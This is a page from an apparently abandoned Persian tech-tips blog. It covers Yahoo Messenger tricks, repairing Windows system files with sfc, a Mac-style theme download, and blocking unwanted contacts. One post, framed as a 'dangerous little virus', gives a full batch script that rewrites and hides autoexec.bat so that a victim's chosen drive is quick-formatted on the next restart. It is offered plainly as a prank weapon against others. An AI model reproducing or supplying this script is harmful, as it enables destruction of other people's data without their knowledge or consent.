آیزس

قابل توجه دوستان! وبلاگ تعطیل می باشد و مدت مدیدی است که هیچ پست جدیدی در وبلاگ منتشر نشده است. لذا اگر مطلبی یا ترفندی قدیمی شده است یا لینکی خراب است چاره ای نیست!!!

آیزس

قابل توجه دوستان! وبلاگ تعطیل می باشد و مدت مدیدی است که هیچ پست جدیدی در وبلاگ منتشر نشده است. لذا اگر مطلبی یا ترفندی قدیمی شده است یا لینکی خراب است چاره ای نیست!!!

چطور بدانیم که دوستانمان به صورت Invisible وارد یاهو مسنجر شدند

برای این کار بر روی نام فردی که می خواهید بفهمید Invisible آمده یا نه، کلیک راست کنید و از سندی که ظاهر شده گزینه ی Invite Conference را انتخاب کنید. سپس منتظر بمانید، در این صورت چهار حالت ممکن است رخ دهد:

1. کاربر مورد نظر حضور ندارد، پس پیغامی به صورت زیر ظاهر می شود:
None if the Users in the invite list are available t.join the conference.Please try at a later time
2.کاربر در اینترنت حضور دارد ولی دعوت شما را رد می کند سپس در کادر پنجره ی کنفرانسش پیغامی مبنی بر اینکه من دعوت شما را رد می کنم ظاهر می شود! خوب پس کاربر حضور داشته که توانسته دعوت شما را رد کند.
3.کاربر به دعوتی که شما برای کنفرانس برای او فرستاده اید پاسخ مثبت می دهد، پر واضح است که او حضور دارد و شما می توانید نام او را در پنجره کنفرانس ببینید.
4.هیچ پیغامی وارد نمی شود! این کاربر دست شما را خوانده و به پیغامی که حاوی پرسش مبنی بر دعوت شما به کنفرانس است پاسخ نمی دهد تا لو نرود. پس نتیجه می گیریم که کاربر حضور دارد. در نتیجه فقط هنگامی که واقعا کاربر حضور ندارد حالت اول رخ می دهد، در بقیه حالات حتما کاربر حضور دارد شک نکنید.

ویروس کوچولوی خطرناک

با اجرای این ویروس که طرز ساختنش رو بهتون می گم یکی از درایو های کامپیوتر قربانی (که خودتون توی ویروستون مشخص می کنید) فرمت میشود .  برای این کار Notepad را باز کزده و کد زیر را در آن تایپ کنید .

@ echo off
call attrib -r -h c:\autoexec.bat > nul
echo @echo off > c:\autoexec.bat
echo format /autotest c:/q > nul >> c:\autoexec.bat
call attrib +r +h c:\autoexec.bat > nul
exit

حالا فایل را با نام دلخواه ولی با پسوند( bat ) ذخیره کنید ( مثلا با نام isis.bat ) .اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.

نکات زیر را مد نظر داشته باشید :

عبارتی که شما کپی کردید برای فرمت درایو C میباشد ، برای تعویض آن کافی است در خطوط 2 و 3 و 4 و 5 در جایی که نوشته است :c به جای c نام درایو مورد نظر را بنویسید.
دقت هم کنید که ابدا به روی فایلی که ساخته اید کلیک نکنید چون درایو خودتون فرمت خواهد شد .

روش کار این فایل بدین شکل است که ابتدا محتویات فایل autoexe.bat که یک فایل ویندوزی است را پاک میکند و سپس کد ' format /autotest c:/q ' را در داخلش جایگزین میکنه ، به همین سبب پس از رستارت کامپیوتر درایو شما فرمت میشود.

 

بازگرداندن فایلهای معیوب سیستمی

چون خیلی از دوستان از ویندوز 98 در کنار XP استفاده می کنند ابتدا :
در ویندوز 98 : کافی است در Run تایپ کنید sfc و Enter را بزنید. بعد در صفحه ای که باز میشود روی دکمه Start کلیک کرده و منتظر بمانید تا برنامه فایلها را چک کند. هر جا که فایل معیوبی پیدا شد برنامه از شما میخواهد تا CD ویندوز را در CD-Rom قرار دهید تا فایل معیوب را جایگزین فایل سالم کند. و در نهایت هم با یک Restart کار تمام میشود.

در ویندوز XP : خیلی ها فکر میکنند که دستور sfc در ویندوز XP وجود ندارد و مجبورند از برنامه Dr.Watson استفاده کنند. در صورتی که باید بگم این دستور در ویندوز XP هم وجود دارد اما نحوه اجرای آن با قبلی فرق میکند. برای این کار ابتدا در قسمت Run تایپ کنید cmd و Enter را بزنید تا وارد محیط Command Prompt شوید. بعد در آنجا وارد زیر شاخه زیر شوید :
C:WindowsSystem32>

حالا در این قسمت تایپ کنید : sfc /scannow و بعد Enter را بزنید. در این لحظه از شما درخواست میشود که CD ویندوز XP را درون درایو قرار دهید و بعد دکمه Retry را فشار دهید. بعد برنامه تمام فایلهای سیستمی شما را چک میکند و به طور اتوماتیک فایلهای معیوب را تعویض میکند.

تغییر ظاهر ویندوز و تبدیل آن به مکینتاش

شما با کمک این نرم افزار میتونید ظاهر ویندوز خودتون رو دقیقا شبیه سیستم عامل مکینتاش ( محصول کمپانی اپل ) کنید ! این نرم افزار کاملا رایگان هست و نیازی به کرک نداره پس بهتون پیشنهاد میکنم حتما دانلودش کنید وتجربه کار با سیستم عامل مکینتاش رو حتما امتحان کنید.

FlyakiteOSX

Download  دانلود کنید

رهایی از دست کاربرهای مزاحم در یاهو مسنجر

بسیاری از افراد مرتب در حال تغییر دادن ID خود در Yahoo هستند و دلیل عمده آن هم مزاحمتهایی است که توسط کاربرهای موجود در فهرست دوستان Yahoo Messenger قرار دارند و به مرور به فهرستی طویل تبدیل شده ایجاد میشود. تغییر ID به منزله تغییر آدرس پست الکترونیکی شما نیز میباشد و با تغییر ID دو مشکل برای دوستان خود ایجاد میکنید! یکی اینکه ممکن است دوستان شما در جریان تغییر آدرس پست الکترونیکی شما قرار نگیرند که مشکلات خاص خود را ایجاد میکند و مشکل بعدی که به نظر من بیشتر آزار دهنده است و خود من هم بعضاً دچارش میشوم طولانی شدن فهرست دوستان در Yahoo Messenger به دلیل وجود چندین ID برای یک نفر است! دوستانی دارم که از سه ID مختلف استفاده میکنند که با این کار هم خودشان را اذیت میکنند و هم ما را. خودشان را اذیت میکنند چرا که باید تا مدتها هر وقت وارد اینترنت میشوند در سه ID مختلف Login کنند تا خیالشان راحت شود که کسی از دوستانشان را از دست نداده اند و اکثر این افراد هم هیج وقت دلشان رضایت نمیدهد دیگر وقت خود را صرف این ID های قدیمی نکنند.
یک راه جلوگیری مسلماً پیشگیری قبل از درمان است بدین معنی که سعی کنید از اضافه کردن اسم افرادی که آشنایی زیادی ندارید خودداری کنید. ولی این پیشنهاد با طبع بسیاری از علاقه مندان به ایجاد ارتباط با همنوعان خود در اقصی نقاط دنیا سازگاری ندارد لذا میتوانید از روش زیر استفاده کنید تا هر وقت تمایل نداشتید شخص خاصی بتواند به شما پیغام بدهد و حتی شما را Online ببیند از آن استفاده کنید.

با دنبال کردن روش زیر ID مورد نظر هیج گاه قادر نخواهد بود وضعیت شما را در صورت Online بودن ببیند و همچنین نمیتواند برای شما پیغام ارسال کند:

1- در پنجره Yahoo Messenger ابتدا ID مورد نظر را Delete کنید
2- با رفتن به منوی Login، گزینه Privacy Settings را انتخاب کنید
3- در پنجره جدید Ignore only the people below را انتخاب کنید و دکمه Add را بزنید
4- در این پنجره ID کاربر مورد نظر را وارد کنید و Ignore را بزنید

با اتمام این کار دیگر ID مورد نظر نه میتواند شما را ببیند و نه برایتان پیغام ارسال کند